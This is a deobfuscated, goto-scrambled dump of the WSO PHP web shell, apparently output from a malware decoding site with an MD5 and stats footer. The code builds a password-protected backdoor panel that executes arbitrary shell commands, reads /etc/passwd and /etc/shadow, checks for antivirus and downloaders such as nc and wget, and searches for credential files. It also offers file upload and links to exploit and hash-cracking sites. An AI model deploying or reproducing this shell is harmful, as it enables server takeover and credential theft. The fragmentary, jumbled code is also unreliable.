(function_exists("mssql_connect")) { $temp[] = "MSSQL"; } goto oKr71; Kcf2h: echo "<h1>Server security information</h1><div class=content>"; goto deosI; GSa9X: echo "<br>"; goto Ppg7_; zA3JJ: wsoSecParam("Server software", @getenv("SERVER_SOFTWARE")); goto aO8HS; IbU7m: echo "</div>"; goto XTIFZ; XTIFZ: wsoFooter(); goto jAziO; V6Pow: wsoSecParam("Safe mode include dir", @ini_get("safe_mode_include_dir")); goto qT_UQ; zEzgM: $temp = array(); goto I0L0t; DQ0Hi: wsoSecParam("Supported databases", implode(", ", $temp)); goto GSa9X; Ppg7_: if ($GLOBALS["os"] == "nix") { goto yzksH; Pr2du: if (!$GLOBALS["safe_mode"]) { goto tBdFD; b1GnC: wsoSecParam("Userful", implode(", ", $temp)); goto gsw3Q; IArV4: $temp = array(); goto bo6ds; SphFn: wsoSecParam("Hosts", @file_get_contents("/etc/hosts")); goto dOgcI; bo6ds: foreach ($userful as $item) { if (wsoWhich($item)) { $temp[] = $item; } } goto b1GnC; VXdNV: wsoSecParam("Danger", implode(", ", $temp)); goto xDJbP; tBdFD: $userful = array("gcc", "lcc", "cc", "ld", "make", "php", "perl", "python", "ruby", "tar", "gzip", "bzip", "bzip2", "nc", "locate", "suidperl"); goto j1mm2; zL0U4: foreach ($danger as $item) { if (wsoWhich($item)) { $temp[] = $item; } } goto VXdNV; F15O4: echo "<br/>"; goto vzm5g; gsw3Q: $temp = array(); goto zL0U4; AYbzB: wsoSecParam("Downloaders", implode(", ", $temp)); goto F15O4; M0R0C: $downloaders = array("wget", "fetch", "lynx", "links", "curl", "get", "lwp-mirror"); goto nuthD; dOgcI: echo "<br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null, null, "5", this . param1 . value, this . param2 . value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form>"; goto Fh4yv; Fh4yv: if (isset($_POST["p2"], $_POST["p3"]) && is_numeric($_POST["p2"]) && is_numeric($_POST["p3"])) { goto TMVUA; Aagop: wsoSecParam("Users", $temp); goto H4g4C; TMVUA: $temp = ''; goto g4wsK; yuLqo: echo "<br/>"; goto Aagop; g4wsK: for (; $_POST["p2"] <= $_POST["p3"]; $_POST["p2"]++) { $uid = @posix_getpwuid($_POST["p2"]); if ($uid) { $temp .= join(":", $uid) . "
"; } } goto yuLqo; H4g4C: } goto GP22b; vzm5g: wsoSecParam("HDD space", wsoEx("df -h")); goto SphFn; j1mm2: $danger = array("kav", "nod32", "bdcored", "uvscan", "sav", "drwebd", "clamd", "rkhunter", "chkrootkit", "iptables", "ipfw", "tripwire", "shieldcc", "portsentry", "snort", "ossec", "lidsadm", "tcplodg", "sxid", "logcheck", "logwatch", "sysmask", "zmbscap", "sawmill", "wormscan", "ninja"); goto M0R0C; xDJbP: $temp = array(); goto pSd_M; pSd_M: foreach ($downloaders as $item) { if (wsoWhich($item)) { $temp[] = $item; } } goto AYbzB; nuthD: echo "<br>"; goto IArV4; GP22b: } goto QDcOt; yzksH: wsoSecParam("Readable /etc/passwd", @is_readable("/etc/passwd") ? "yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a>" : "no"); goto ledym; ESH98: wsoSecParam("OS version", @file_get_contents("/proc/version")); goto ZLZ7x; ZLZ7x: wsoSecParam("Distr name", @file_get_contents("/etc/issue.net")); goto Pr2du; ledym: wsoSecParam("Readable /etc/shadow", @is_readable("/etc/shadow") ? "yes <a href='#' onclick='g("FilesTools", "/etc/", "shadow")'>[view]</a>" : "no"); goto ESH98; QDcOt: } else { goto NsBCo; Me9Q1: wsoSecParam("Account Settings", wsoEx("net accounts")); goto RXCoL; NsBCo: wsoSecParam("OS Version", wsoEx("ver")); goto Me9Q1; RXCoL: wsoSecParam("User Accounts", wsoEx("net user")); goto DnuxL; DnuxL: } goto IbU7m; wqp98: wsoHeader(); goto Kcf2h; aO8HS: if (function_exists("apache_get_modules")) { wsoSecParam("Loaded Apache modules", implode(", ", apache_get_modules())); } goto m3Zin; deosI: function wsoSecParam($n, $v) { $v = trim($v); if ($v) { echo "<span>" . $n . ": </span>"; if (strpos($v, "
") === false) { echo $v . " < br>"; } else { echo " < pre class=ml1 > " . $v . "</pre > "; } } } goto zA3JJ; jAziO: } goto oHsYW; qljle: if ($cwd[strlen($cwd) - 1] != "/") { $cwd .= " / "; } goto j4eIF; g7ZCc: @ini_set("log_errors", 0); goto ABTpd; XeOpc: if (!function_exists("posix_getpwuid") && strpos($GLOBALS["disable_functions"], "posix_getpwuid") === false) { function posix_getpwuid($p) { return false; } } goto lUvYe; KC9ar: function actionStringTools() { goto MBvsT; S0req: if (empty($_POST["ajax"]) && !empty($_POST["p1"])) { WSOsetcookie(md5($_SERVER["HTTP_HOST"]) . "ajax", 0); } goto nYBgB; Oymko: if (!function_exists("hex2ascii")) { function hex2ascii($p) { goto uM0Pu; NG1dD: return $r; goto fKGDN; uM0Pu: $r = ''; goto ac1Yo; ac1Yo: for ($i = 0; $i < strLen($p); $i += 2) { $r .= chr(hexdec($p[$i] . $p[$i + 1])); } goto NG1dD; fKGDN: } } goto ZMcUd; vUNKP: echo "</select ><input type = 'submit' value = '>>' /> <input type = checkbox name = ajax value = 1 " . (@$_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"] ? "checked" : '') . " > send using AJAX < br><textarea name = 'input' style = 'margin-top:5px' class=bigarea > " . (empty($_POST["p1"]) ? '' : htmlspecialchars(@$_POST["p2"])) . "</textarea ></form ><pre class='ml1' style = '" . (empty($_POST["p1"]) ? "display:none;" : '') . "margin-top:5px' id = 'strOutput' > "; goto k5nqW; ZMcUd: if (!function_exists("ascii2hex")) { function ascii2hex($p) { goto cdb2T; O0tgA: for ($i = 0; $i < strlen($p); ++$i) { $r .= sprintf(" % 02X", ord($p[$i])); } goto JVXpM; cdb2T: $r = ''; goto O0tgA; JVXpM: return strtoupper($r); goto I6jbu; I6jbu: } } goto q2kmv; HYxD9: echo " < h1>String conversions </h1 ><div class=content > "; goto OX44o; awjDW: function wsoRecursiveGlob($path) { goto TkAHe; lEFZ5: if (is_array($paths) && @count($paths)) { foreach ($paths as $item) { if (@is_dir($item)) { if ($path != $item) { wsoRecursiveGlob($item); } } else { if (empty($_POST["p2"]) || @strpos(file_get_contents($item), $_POST["p2"]) !== false) { echo "<a href = '#' onclick = 'g("FilesTools",null,"" . urlencode($item) . "", "view","")' > " . htmlspecialchars($item) . "</a ><br > "; } } } } goto fVCol; GUM3F: $paths = @array_unique(@array_merge(@glob($path . $_POST["p3"]), @glob($path . "*", GLOB_ONLYDIR))); goto lEFZ5; TkAHe: if (substr($path, -1) != " / ") { $path .= " / "; } goto GUM3F; fVCol: } goto qLbIZ; aUced: if (!function_exists("binhex")) { function binhex($p) { return dechex(bindec($p)); } } goto Oymko; MBvsT: if (!function_exists("hex2bin")) { function hex2bin($p) { return decbin(hexdec($p)); } } goto aUced; q2kmv: if (!function_exists("full_urlencode")) { function full_urlencode($p) { goto d1_DN; d1_DN: $r = ''; goto D3iJl; YAXHC: return strtoupper($r); goto wfgBE; D3iJl: for ($i = 0; $i < strlen($p); ++$i) { $r .= " % " . dechex(ord($p[$i])); } goto YAXHC; wfgBE: } } goto IHtdM; N3xOi: if (isset($_POST["ajax"])) { goto V2x0a; Wm5Kx: exit; goto IafqZ; x5Jd7: if (in_array($_POST["p1"], $stringTools)) { echo $_POST["p1"]($_POST["p2"]); } goto vD3zd; vD3zd: $temp = "document . getElementById('strOutput') . style . display = '';document . getElementById('strOutput') . innerHTML = '" . addcslashes(htmlspecialchars(ob_get_clean()), "
\xd\x9\'\x0") . "';\xa"; goto NED_K; V2x0a: WSOsetcookie(md5($_SERVER["HTTP_HOST"]) . "ajax", true); goto LTDt0; LTDt0: ob_start(); goto x5Jd7; NED_K: echo strlen($temp), "
", $temp; goto Wm5Kx; IafqZ: } goto S0req; nYBgB: wsoHeader(); goto HYxD9; k5nqW: if (!empty($_POST["p1"])) { if (in_array($_POST["p1"], $stringTools)) { echo htmlspecialchars($_POST["p1"]($_POST["p2"])); } } goto jZzWZ; OX44o: echo "<form name = 'toolsForm' onSubmit = 'if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;' ><select name = 'selectTool' > "; goto BBAR5; Rfc53: wsoFooter(); goto JMM51; uWngZ: echo "</div ><br ><h1 > Search for hash:</
h1 ><div class=content > \xd\xa \x9<form method = 'post' target = '_blank' name = 'hf' >
\xa \x9\x9<input type = 'text' name = 'hash' style = 'width:200px;' ><br > \xd
<input type = 'hidden' name = 'act' value = 'find' />
\x9 <input type = 'button' value = 'hashcracking.ru' onclick = "document.hf.action='https://hashcracking.ru/index.php';document.hf.submit()" ><br >
\x9 <input type = 'button' value = 'md5.rednoize.com' onclick = "document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()" ><br >
\xa <input type = 'button' value = 'crackfor.me' onclick = "document.hf.action='http://crackfor.me/index.php';document.hf.submit()" ><br >
\x9 </form ></div > "; goto Rfc53; BBAR5: foreach ($stringTools as $k => $v) { echo "<option value = '" . htmlspecialchars($v) . "' > " . $k . "</option > "; } goto vUNKP; qLbIZ: if (@$_POST["p3"]) { wsoRecursiveGlob($_POST["c"]); } goto uWngZ; jZzWZ: echo "</pre ></div ><br ><h1 > Search files:</h1 ><div class=content > \xd
\x9 <form onsubmit = "g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;" ><table cellpadding = '1' cellspacing = '0' width = '50%' > \xd
\x9<tr ><td width = '1%' > Text:</td ><td ><input type = 'text' name = 'text' style = 'width:100%' ></td ></tr > \xd\xa\x9\x9 <tr ><td > Path:</td ><td ><input type = 'text' name = 'cwd' value = '" . htmlspecialchars($GLOBALS["cwd"]) . "' style = 'width:100%' ></td ></tr > \xd\xa <tr ><td > Name:</td ><td ><input type = 'text' name = 'filename' value = '*' style = 'width:100%' ></td ></tr >
\xa\x9 <tr ><td ></td ><td ><input type = 'submit' value = '>>' ></td ></tr > \xd\xa \x9 </table ></form > "; goto awjDW; IHtdM: $stringTools = array("Base64 encode" => "base64_encode", "Base64 decode" => "base64_decode", "Url encode" => "urlencode", "Url decode" => "urldecode", "Full urlencode" => "full_urlencode", "md5 hash" => "md5", "sha1 hash" => "sha1", "crypt" => "crypt", "CRC32" => "crc32", "ASCII to HEX" => "ascii2hex", "HEX to ASCII" => "hex2ascii", "HEX to DEC" => "hexdec", "HEX to BIN" => "hex2bin", "DEC to HEX" => "dechex", "DEC to BIN" => "decbin", "BIN to HEX" => "binhex", "BIN to DEC" => "bindec", "String to lower case" => "strtolower", "String to upper case" => "strtoupper", "Htmlspecialchars" => "htmlspecialchars", "String length" => "strlen"); goto N3xOi; JMM51: } goto xB4MH; sO9OV: $cwd = @getcwd(); goto cUzsD; SG2I5: function WSOstripslashes($array) { return is_array($array) ? array_map("WSOstripslashes", $array) : stripslashes($array); } goto M9YJl; EoPoZ: if ($os == "win") { $aliases = array("list Directory" => "dir", "Find index . php in current dir" => "dir / s / w / b index . php", "Find * config *.php in current dir" => "dir / s / w / b * config *.php", "Show active connections" => "netstat - an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp - a", "IP Configuration" => "ipconfig / all"); } else { $aliases = array("list dir" => "ls - lha", "list file attributes on a Linux second extended file system" => "lsattr - va", "show opened ports" => "netstat - an | grep - i listen", "process status" => "ps aux", "Find" => '', "find all suid files" => "find / -type f - perm - 04000 - ls", "find suid files in current dir" => "find . -type f - perm - 04000 - ls", "find all sgid files" => "find / -type f - perm - 02000 - ls", "find sgid files in current dir" => "find . -type f - perm - 02000 - ls", "find config . inc . php files" => "find / -type f - name config . inc . php", "find config * files" => "find / -type f - name "config*"", "find config * files in current dir" => "find . -type f - name "config*"", "find all writable folders and files" => "find / -perm - 2 - ls", "find all writable folders and files in current dir" => "find . -perm - 2 - ls", "find all service . pwd files" => "find / -type f - name service . pwd", "find service . pwd files in current dir" => "find . -type f - name service . pwd", "find all . htpasswd files" => "find / -type f - name . htpasswd", "find . htpasswd files in current dir" => "find . -type f - name . htpasswd", "find all . bash_history files" => "find / -type f - name . bash_history", "find . bash_history files in current dir" => "find . -type f - name . bash_history", "find all . fetchmailrc files" => "find / -type f - name . fetchmailrc", "find . fetchmailrc files in current dir" => "find . -type f - name . fetchmailrc", "Locate" => '', "locate httpd . conf files" => "locate httpd . conf", "locate vhosts . conf files" => "locate vhosts . conf", "locate proftpd . conf files" => "locate proftpd . conf", "locate psybnc . conf files" => "locate psybnc . conf", "locate my . conf files" => "locate my . conf", "locate admin . php files" => "locate admin . php", "locate cfg . php files" => "locate cfg . php", "locate conf . php files" => "locate conf . php", "locate config . dat files" => "locate config . dat", "locate config . php files" => "locate config . php", "locate config . inc files" => "locate config . inc", "locate config . inc . php" => "locate config . inc . php", "locate config .default.php files" => "locate config .default.php", "locate config * files " => "locate config", "locate . conf files" => "locate '.conf'", "locate . pwd files" => "locate '.pwd'", "locate . sql files" => "locate '.sql'", "locate . htpasswd files" => "locate '.htpasswd'", "locate . bash_history files" => "locate '.bash_history'", "locate . mysql_history files" => "locate '.mysql_history'", "locate . fetchmailrc files" => "locate '.fetchmailrc'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv"); } goto MrsTM; Cjo7J: $color = "#df5"; goto LNmAT; ocXfq: $_COOKIE = WSOstripslashes($_COOKIE); goto Qn_9k; dPSqc: if (empty($_POST["a"])) { if (isset($default_action) && function_exists("action" . $default_action)) { $_POST["a"] = $default_action; } else { $_POST["a"] = "SecInfo"; } } goto j2Rfu; fj9OS: if ($argc == 3) { $_POST = unserialize(base64_decode($argv[1])); $_SERVER = unserialize(base64_decode($argv[2])); } goto GFRHq; MrsTM: function wsoHeader() { goto E9rcc; FKql5: echo "<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:" . ($GLOBALS["os"] == "win" ? "<br>Drives:" : '') . "</span></td>" . "<td><nobr>" . substr(@php_uname(), 0, 120) . " <a href="" . $explink . "" target=_blank>[exploit-db.com]</a></nobr><br>" . $uid . " ( " . $user . " ) <span>Group:</span> " . $gid . " ( " . $group . " )<br>" . @phpversion() . " <span>Safe mode:</span> " . ($GLOBALS["safe_mode"] ? "<font color=red>ON</font>" : "<font color=green><b>OFF</b></font>") . " <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> " . date("Y-m-d H:i:s") . "<br>" . wsoViewSize($totalSpace) . " <span>Free:</span> " . wsoViewSize($freeSpace) . " (" . (int) ($freeSpace / $totalSpace * 100) . "%)<br>" . $cwd_links . " " . wsoPermsColor($GLOBALS["cwd"]) . " <a href=# onclick="g('FilesMan','" . $GLOBALS["home_cwd"] . "','','','')">[ home ]</a><br>" . $drives . "</td>" . "<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">" . $opt_charsets . "</optgroup></select><br><span>Server IP:</span><br>" . @$_SERVER["SERVER_ADDR"] . "<br><span>Client IP:</span><br>" . $_SERVER["REMOTE_ADDR"] . "</nobr></td></tr></table>" . "<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>" . $menu . "</tr></table><div style="margin:5">"; goto RzURU; M4wyI: $m = array("Sec. Info" => "SecInfo", "Files" => "FilesMan", "Console" => "Console", "Sql" => "Sql", "Php" => "Php", "String tools" => "StringTools", "Bruteforce" => "Bruteforce", "Network" => "Network"); goto JIPap; XR0lk: $totalSpace = $totalSpace ? $totalSpace : 1; goto gDdS4; QoI2U: $drives = ''; goto dJUUJ; E9rcc: if (empty($_POST["charset"])) { $_POST["charset"] = $GLOBALS["default_charset"]; } goto wwJNm; yWMQp: $charsets = array("UTF-8", "Windows-1251", "KOI8-R", "KOI8-U", "cp866"); goto QAzn_; JIPap: if (!empty($GLOBALS["auth_pass"])) { $m["Logout"] = "Logout"; } goto hedz2; nmRB7: echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST["charset"] . "'><title>" . $_SERVER["HTTP_HOST"] . " - WSO " . WSO_VERSION . "</title>\xd
< style>
\xabody{
background - color:#444;color:#e1e1e1;}
\xabody,td,th{
font:
9pt Lucida,Verdana;margin:0;vertical - align:top;color:#e1e1e1; }\xd\xatable.info{ color:#fff;background-color:#222; }
\xaspan,h1,a{
color: {
$color}
!important;
}\xd
span{
font - weight: bolder; }\xd
h1{
border - left:5px solid {
$color};padding: 2px 5px;font: 14pt Verdana;background - color:#222;margin:0px; }\xd
div . content{
padding:
5px;margin - left:5px;background - color:#333; }\xd\xaa{ text-decoration:none; }\xd\xaa:hover{ text-decoration:underline; }
\xa . ml1{
border:
1px solid #444;padding:5px;margin:0;overflow: auto; }
. bigarea{
width:
100 %;
height:
300px; }\xd\xainput,textarea,select{
margin:
0;
color:#fff;background-color:#555;border:1px solid {$color}; font: 9pt Monospace,'Courier New'; }\xd
form{
margin:
0px; }
\xa#toolsTbl{ text-align:center; }
\xa . toolsInp{
width:
300px }
\xa . main th{
text - align:left;background - color:#5e5e5e;}\xd\xa.main tr:hover{background-color:#5e5e5e}
.l1{
background - color:#444}
\xa . l2{
background - color:#333}\xd
pre{
font - family:Courier,Monospace;}
</style >
\xa<script >
\xa var c_ = '" . htmlspecialchars($GLOBALS["cwd"]) . "';\xd\xa var a_ = '" . htmlspecialchars(@$_POST["a"]) . "'\xd
var charset_ = '" . htmlspecialchars(@$_POST["charset"]) . "';\xd
var p1_ = '" . (strpos(@$_POST["p1"], "
") !== false ? '' : htmlspecialchars($_POST["p1"], ENT_QUOTES)) . "';
var p2_ = '" . (strpos(@$_POST["p2"], "
") !== false ? '' : htmlspecialchars($_POST["p2"], ENT_QUOTES)) . "';\xd\xa var p3_ = '" . (strpos(@$_POST["p3"], "\xa") !== false ? '' : htmlspecialchars($_POST["p3"], ENT_QUOTES)) . "';
var d = document;\xd\xa\x9function set(a, c, p1, p2, p3, charset){
\xa \x9if(a != null)d . mf . a . value = a;else d . mf . a . value = a_;\xd\xa if (c != null) d . mf . c . value = c; else d . mf . c . value = c_;
if (p1 != null) d . mf . p1 . value = p1; else d . mf . p1 . value = p1_;
\xa \x9if(p2 != null)d . mf . p2 . value = p2;else d . mf . p2 . value = p2_;\xd
\x9if(p3 != null)d . mf . p3 . value = p3;else d . mf . p3 . value = p3_;
\xa\x9\x9if(charset != null)d . mf . charset . value = charset;else d . mf . charset . value = charset_;\xd
}\xd\xa\x9function g(a, c, p1, p2, p3, charset){
\x9 set(a, c, p1, p2, p3, charset);\xd\xa\x9 d . mf . submit();\xd
\x9}\xd
function a(a,c,p1,p2,p3,charset) {
set(a, c, p1, p2, p3, charset);
\xd\xa \x9var params = 'ajax=true';\xd\xa\x9\x9for(i = 0;i < d . mf . elements . length;i++)
\xa\x9 \x9params += '&' + d . mf . elements[i] . name + '=' + encodeURIComponent(d . mf . elements[i] . value);\xd
\x9\x9sr('" . addslashes($_SERVER["REQUEST_URI"]) . "', params);
\xa\x9}\xd
\x9function sr(url, params){\xd
\x9if(window . XMLHttpRequest)
\xa \x9 req = new XMLHttpRequest();\xd
\x9\x9else if (window . ActiveXObject) \xd\xa\x9\x9 req = new ActiveXObject('Microsoft.XMLHTTP');\xd
if (req) {
\xd
req . onreadystatechange = processReqChange;\xd\xa req . open('POST', url, true);
\xa req . setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');\xd\xa req . send(params);\xd
}
\xa }
\xa\x9function processReqChange(){
if ((req . readyState == 4))
\xa \x9\x9if(req . status == 200){\xd
\x9\x9var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm');\xd
var arr = reg . exec(req . responseText);\xd
\x9 eval(arr[2] . substr(0, arr[1]));\xd\xa\x9\x9\x9} else alert('Request error!');
\xa\x9}
</script >
\xa<head ><body ><div style = 'position:absolute;width:100%;background-color:#444;top:0;left:0;' >
<form method = post name = mf style = 'display:none;' > \xd
<input type = hidden name = a > \xd
<input type = hidden name = c > \xd
<input type = hidden name = p1 >
\xa<input type = hidden name = p2 > \xd
<input type = hidden name = p3 >
\xa<input type = hidden name = charset > \xd
</form > "; goto yrJci; HJ09z: $totalSpace = @disk_total_space($GLOBALS["cwd"]); goto XR0lk; mxXoN: $explink = "http://exploit-db.com/search/?action=search&filter_description="; goto CGFSE; jqLRT: $menu = ''; goto pyClH; znu8e: $kernel = @php_uname("s"); goto mxXoN; IUSK1: for ($i = 0; $i < $n - 1; $i++) { $cwd_links .= "<a href='#' onclick='g("FilesMan",""; for ($j = 0; $j <= $i; $j++) { $cwd_links .= $path[$j] . "/"; } $cwd_links .= "")'>" . $path[$i] . "/</a>"; } goto yWMQp; QAzn_: $opt_charsets = ''; goto wJ6Eu; hedz2: $m["Self remove"] = "SelfRemove"; goto jqLRT; MFEdT: $n = count($path); goto IUSK1; PbU2y: $path = explode("/", $GLOBALS["cwd"]); goto MFEdT; CGFSE: if (strpos("Linux", $kernel) !== false) { $explink .= urlencode("Linux Kernel " . substr($release, 0, 6)); } else { $explink .= urlencode($kernel . " " . substr($release, 0, 3)); } goto oXY47; yrJci: $freeSpace = @diskfreespace($GLOBALS["cwd"]); goto HJ09z; pyClH: foreach ($m as $k => $v) { $menu .= "<th width="" . (int) (100 / count($m)) . "%">[ <a href="#" onclick="g('" . $v . "',null,'','','')">" . $k . "</a> ]</th>"; } goto QoI2U; wJ6Eu: foreach ($charsets as $item) { $opt_charsets .= "<option value="" . $item . "" " . ($_POST["charset"] == $item ? "selected" : '') . ">" . $item . "</option>"; } goto M4wyI; dJUUJ: if ($GLOBALS["os"] == "win") { foreach (range("c", "z") as $drive) { if (is_dir($drive . ":\")) { $drives .= "<a href="#" onclick="g('FilesMan','" . $drive . ":/')">[ " . $drive . " ]</a> "; } } } goto FKql5; wwJNm: global $color; goto nmRB7; gDdS4: $release = @php_uname("r"); goto znu8e; oXY47: if (!function_exists("posix_getegid")) { goto VMtJd; VMtJd: $user = @get_current_user(); goto RNehq; RNehq: $uid = @getmyuid(); goto kWs3Y; n3X6Y: $group = "?"; goto dyMHz; kWs3Y: $gid = @getmygid(); goto n3X6Y; dyMHz: } else { goto ec83q; yJq0B: $uid = $uid["uid"]; goto nZ1Iw; nZ1Iw: $group = $gid["name"]; goto LgEQ1; LgEQ1: $gid = $gid["gid"]; goto XEe3x; q9aTZ: $user = $uid["name"]; goto yJq0B; ERGtZ: $gid = @posix_getgrgid(posix_getegid()); goto q9aTZ; ec83q: $uid = @posix_getpwuid(posix_geteuid()); goto ERGtZ; XEe3x: } goto HU3s7; HU3s7: $cwd_links = ''; goto PbU2y; RzURU: } goto pXSrD; lUvYe: if (!function_exists("posix_getgrgid") && strpos($GLOBALS["disable_functions"], "posix_getgrgid") === false) { function posix_getgrgid($p) { return false; } } goto d62j5; V8rDW: @set_time_limit(0); goto hd5Oa; KCE0z: function wsoWhich($p) { goto qE7x8; bvBsL: if (!empty($path)) { return $path; } goto A0ITv; qE7x8: $path = wsoEx("which " . $p); goto bvBsL; A0ITv: return false; goto xhdvj; xhdvj: } goto HhMRL; guAyk: function wsoScandir($dir) { if (function_exists("scandir")) { return scandir($dir); } else { goto AwLVq; hfmSV: while (false !== ($filename = readdir($dh))) { $files[] = $filename; } goto Rc9At; Rc9At: return $files; goto dO6EV; AwLVq: $dh = opendir($dir); goto hfmSV; dO6EV: } } goto KCE0z; pXSrD: function wsoFooter() { $is_writable = is_writable($GLOBALS["cwd"]) ? " <font color='green'>(Writeable)</font>" : " <font color=red>(Not writable)</font>"; echo "\xd\xa</div>\xd
<table class=info id = toolsTbl cellpadding = 3 cellspacing = 0 width = 100 % style = 'border-top:2px solid #333;border-bottom:2px solid #333;' > \xd\xa\x9<tr >
\x9\x9<td ><form onsubmit = 'g(null,this.c.value,"");return false;' ><span > Change dir:</span ><br ><input class='toolsInp' type = text name = c value = '" . htmlspecialchars($GLOBALS["cwd"]) . "' ><input type = submit value = '>>' ></form ></td >
\xa \x9<td ><form onsubmit = "g('FilesTools',null,this.f.value);return false;" ><span > Read file:</span ><br ><input class='toolsInp' type = text name = f ><input type = submit value = '>>' ></form ></td > \xd
</tr ><tr >
\xa\x9 <td ><form onsubmit = "g('FilesMan',null,'mkdir',this.d.value);return false;" ><span > Make dir:</span >{
$is_writable}<br ><input class='toolsInp' type = text name = d ><input type = submit value = '>>' ></form ></td >
<td ><form onsubmit = "g('FilesTools',null,this.f.value,'mkfile');return false;" ><span > Make file:</span >{
$is_writable}<br ><input class='toolsInp' type = text name = f ><input type = submit value = '>>' ></form ></td >
\xa\x9</tr ><tr > \xd\xa <td ><form onsubmit = "g('Console',null,this.c.value);return false;" ><span > Execute:</span ><br ><input class='toolsInp' type = text name = c value = '' ><input type = submit value = '>>' ></form ></td >
\xa <td ><form method = 'post' ENCTYPE = 'multipart/form-data' >
\xa\x9\x9<input type = hidden name = a value = 'FilesMAn' >
\x9 <input type = hidden name = c value = '" . $GLOBALS["cwd"] . "' > \xd
\x9 <input type = hidden name = p1 value = 'uploadFile' > \xd
\x9\x9<input type = hidden name = charset value = '" . (isset($_POST["charset"]) ? $_POST["charset"] : '') . "' >
\x9\x9<span > Upload file:</span >{
$is_writable}<br ><input class='toolsInp' type = file name = f ><input type = submit value = '>>' ></form ><br ></td >
\x9</tr ></table ></div ></body ></html > "; } goto XeOpc; Qn_9k: function wsoLogin() { die("<pre align = center ><form method = post > Password: <input type = password name = pass ><input type = submit value = '>>' ></form ></pre > "); } goto e2q7d; i6mTz: function actionSelfRemove() { goto KQZY3; trHKc: if ($_POST["p1"] != "yes") { wsoHeader(); } goto X7soZ; X7soZ: echo " < h1>Suicide </h1 ><div class=content > Really want to remove the shell ?<br ><a href =# onclick="g(null,null,'yes')">Yes</a></div>"; goto tsvXj; KQZY3: if ($_POST["p1"] == "yes") { if (@unlink(preg_replace("!\(\d+\)\s.*!", '', __FILE__))) { die("Shell has been removed"); } else { echo "unlink error!"; } } goto trHKc; tsvXj: wsoFooter(); goto n3JxC; n3JxC: } goto DbGtY; TQr3j: if (!empty($auth_pass)) { if (isset($_POST["pass"]) && md5($_POST["pass"]) == $auth_pass) { WSOsetcookie(md5($_SERVER["HTTP_HOST"]), $auth_pass); } if (!isset($_COOKIE[md5($_SERVER["HTTP_HOST"])]) || $_COOKIE[md5($_SERVER["HTTP_HOST"])] != $auth_pass) { wsoLogin(); } } goto tZUOM; e2q7d: function WSOsetcookie($k, $v) { $_COOKIE[$k] = $v; setcookie($k, $v); } goto TQr3j; yXkOt: function wsoViewSize($s) { if ($s >= 1073741824) { return sprintf("%1.2f", $s / 1073741824) . " GB"; } elseif ($s >= 1048576) { return sprintf("%1.2f", $s / 1048576) . " MB"; } elseif ($s >= 1024) { return sprintf("%1.2f", $s / 1024) . " KB"; } else { return $s . " B"; } } goto etiAC; Zxful: exit; ?>
Function Calls
| None |
Stats
| MD5 | bd7ebeb51dfdaf8d97eb4b834560842e |
| Eval Count | 0 |
| Decode Time | 233 ms |